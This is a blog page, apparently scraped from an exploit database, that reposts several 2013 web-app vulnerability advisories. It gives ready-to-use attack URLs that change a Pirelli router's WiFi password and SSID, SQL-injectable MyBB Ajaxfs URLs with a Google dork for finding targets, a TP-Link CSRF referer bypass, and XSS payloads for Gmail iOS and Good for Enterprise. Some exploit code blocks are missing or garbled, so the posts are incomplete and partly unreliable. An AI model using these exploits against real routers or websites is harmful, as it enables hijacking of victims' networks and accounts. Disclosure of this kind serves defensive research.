You Might Also Like

Showing posts with label webapps. Show all posts
Showing posts with label webapps. Show all posts

Monday, November 25, 2013

[webapps] - Pirelli Discus DRG A125g - Remote Change WiFi Password Vulnerability

ad


# Exploit Title: Pirelli Discus DRG A125g remote change wifi passwordvulnerability


# Hardware: Pirelli Discus DRG A125g


# Date: 2013/11/23# Exploit Author: Sebastián Magof


# Tested on: Linux/Windows


# Twitter: @smagof


# Greetz: Family, friends && under guys.


# Special Greetz:


# (\/)


# (**) alpha


#(")(")


#Exploit:http://10.0.0.2/wladv.wl?wlSsidIdx=0&wlHide=0&wlAuthMode=psk2&wlAuth=0&wlWep=disabled&wlWpaPsk=PASSWORDHERE&wlWpaGtkRekey=0&wlKeyBit=1&wlPreauth=1&wlWpa=tkip#info: where the parameter wlWpaPsk=PASSWORDHERE is where we will enter thepassword we want to put the victim wifi. If the victim clicks on the urlyour modem / router will reboot automatically with the new passwordprovided by the attacker.


View the original article here

Posted by Abonk at 11:18 AM 0 comments
Labels: , , , , , , ,

[webapps] - MyBB Ajaxfs 2 Plugin - SQL Injection Vulnerability

ad

Screenshot

############################ Mybb Ajaxfs Plugin Sql Injection vulnerability############################################################## @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@###################################### # Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability # Author : Iranian Exploit DataBase # Discovered By : IeDb # Email : [email protected] - [email protected] # Home : http://iedb.ir - http://iedb.ir/acc # Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538 # Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2 # Security Risk : High # Tested on : Linux # Dork : inurl:ajaxfs.php ################################# 1) if(isset($_GET['tooltip'])) { $pid=$_GET['tooltip']; $query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'"); 2) if(isset($_GET['usertooltip'])) { $uid=$_GET['usertooltip']; $query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'"); http://localhost/Upload/ajaxfs.php?usertooltip=1' 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 Google DORK : inurl:ajaxfs.php # Exploit : # http://site.com/mybb/ajaxfs.php?tooltip=[sql] # http://site.com/mybb/ajaxfs.php?usertooltip=[sql] ################################# # Tnx To : All Member In Iedb.ir/acc & Iranian Hackers #################################

View the original article here

Posted by Abonk at 10:25 AM 0 comments
Labels: , , , ,

[webapps] - WBR-3406 Wireless Broadband NAT Router Web-Console - Password Change Bypass & CSRF Vulnerability

ad


# -----------------------------------------------------------#


WBR-3406 Wireless Broadband NAT Router Web-Console Password Change Bypass & CSRF Vulnerability


# This PoC code should do two main things:# 1. Cross Site Request Forgery (For more information, just google it).


# 2. This code change to new password without know the current password.


# The vulnerability work in a way that if we remove the "PA=" parameter which is the current password


# the application ignore that and change the password without even entering the old / current password.


# Bug discovered by Pr0T3cT10n AKA Yakir Wizman,


# Date 17/08/2012


# Vendor site - http://www.level1.com/


# ISRAEL# -----------------------------------------------------------


# Author will be not responsible for any damage.# -----------------------------------------------------------


# PoC EXPLOIT


# -----------------------------------------------------------


# -----------------------------------------------------------

View the original article here

Posted by Abonk at 9:55 AM 0 comments
Labels: , , , , , , , , ,

[webapps] - Google Gmail IOS Mobile Application - Persistent / Stored XSS

ad


Title:======Gmail IOS Application Attachment Cross Site Scripting


Date:=====


2013-11-11


Introduction:=============


Gmail is a free, advertising-supported email service provided by Google. Users may access Gmail as secure webmail, as well as via POP3 or IMAP4 protocols. Gmail initially started as an invitation-only beta release on April 1, 2004 and it became available to the general public on February 7, 2007, though still in beta status at that time. The service was upgraded from beta status on July 7, 2009, along with the rest of the Google Apps suite.With an initial storage capacity offer of 1 GB per user, Gmail significantly increased the webmail standard for free storage from the 2 to 4 MB its competitors such as Hotmail offered at that time. Individual Gmail messages, including attachments, may be up to 25 MB, which is larger than many other mail services support. Gmail has a search-oriented interface and a "conversation view" similar to an Internet forum. Gmail is noted by web developers for its pioneering use of Ajax. Gmail runs on Google GFE/2.0 on Linux. As of June 2012, it is the most widely used web-based email provider with over 425 million active users worldwide.


Report-Timeline:================


2013-11-11:


Researcher Notification & Coordination (Ali Raza Khawaja)


Status:========


Unpublished


Affected Products:


==================Google Gmail Mobile IOS Application


Exploitation-Technique:=======================


RemoteSeverity:=========


Medium


Details:========


A persistent / stored XSS vulnerability is detected in the official Google Gmail IOS Mobile Application. The vulnerability allows remote attackers to inject own malicious script code to a vulnerable module on application-side (persistent) via mail attachment feature. All iPad/iPhone users are affected directly with this vulnerability.During the testing it was discovered that .html files can be attached to outgoing emails. Viewing these attachments directly from your iphone/ipad device results in successful execution of malicious script code. The application does not seem to perform secure parsing in this case. Attackers can use this feature to exploit Gmail IOS users by injecting malicious iframes and redirecting users to external domains. Vulnerable Module(s):[+] Compose Mail > Attach FilesProof of Concept:=================1) Open any text editor and paste the payload and save the file as a payload.html2) Compose your email with any mail service provider and attach HTML file via attachment feature.3) Open the recived email on your Gmail IOS application.4) Click on attachment file.5) The iframe can be see on the Gmail IOS application proving the existence of this vulnerability.Payload:========'%3d'>">/927Credits:========Ali Raza Khawaja - Security Consultant arkhawaja@outlook.com


View the original article here

Posted by Abonk at 8:38 AM 0 comments
Labels: , , , , , ,

[webapps] - TPLINK WR740N/WR740ND - Multiple CSRF Vulnerabilities

ad


# Exploit Title: TPLINK WR740N Multiple CSRF Vulnerabilities


# Date: 11/24/2013


# Author: SaMaN( @samanL33T )


# Vendor Homepage: http://tplink.com


# Category: Hardware/Wireless Router


# Firmware Version: 3.16.6 Build 130529 Rel.47286n and below


# Tested on: WR740N/WR740ND (May be possible on other models)--------------------------------------------------- Technical Details~~~~~~~~~~~~~~~~~~TPLINK WIreless Router WR740N has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password,Reboot Router,Change Settings by simply making the user visit a CSRF link.Application uses "HTTP-REFERER" check functionality to check for CSRF attacks. But it can easily be bypassed using the "Referer" parameter with value set to target's I.P in the GET request.Exploit Code ~~~~~~~~~~~~~Change WPA/WPA2 password by CSRF~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


#For Changing the Security to Open WEP, simply change "secType" value to 1.Reboot Router by CSRF~~~~~~~~~~~~~~~~~~~~~
Factory Reset the Router~~~~~~~~~~~~~~~~~~~~~~~~
--SaMaNtwitter : @samanL33T

View the original article here

Posted by Abonk at 7:51 AM 0 comments
Labels: , , , ,

[webapps] - Pirelli Discus DRG A125g - Remote Change SSID Value Vulnerability

ad


# Exploit Title: Pirelli Discus DRG A125g remote change SSID valuevulnerability


# Hardware: Pirelli Discus DRG A125g


# Date: 2013/11/23


# Exploit Author: Sebastián Magof


# Tested on: Linux/Windows


# Twitter: @smagof


# Greetz: Family, friends && under guys.


# Special Greetz:


# (\/)# (**) alpha


#(")(")


#Exploit:http://10.0.0.2/wlbasic.wl?wlSsidIdx=0&wlSsid=bysmagof#info: where the parameter "wlSsid" is where the attacker will enter thenew SSID. If the victim clicks on the url your modem / router will rebootautomatically with the new SSID provided by the attacker.


View the original article here

Posted by Abonk at 7:05 AM 0 comments
Labels: , , , , , , ,

Thursday, September 26, 2013

[webapps] - Good for Enterprise 2.2.2.1611 - XSS Vulnerability

The vulnerable versions are v2.2.2.1611 and earlier Proof of Concept:HTML Email including the following payload will execute Javascript statements when the victim open the email using the vulnerable version. Payload: < script >alert('XSS Here')< / script> Remediation:I worked with the Good people to close the issue, I provided some guidance and feedback and agreed with them to not disclose it until they fix it.The new release is now available:Update the "Good for Enterprise" iOS application to 2.2.4.1659 or newer References:https://www.roblest.com/#research:CVE-2013-5118 Can the comunity please provide feedback and comments in order to ensure the fix is working wellMany thanksMario
View the original article here
Posted by Penulis at 6:55 AM 0 comments
Labels: , , ,
Subscribe to: Posts (Atom)

Advertisements

Advertisements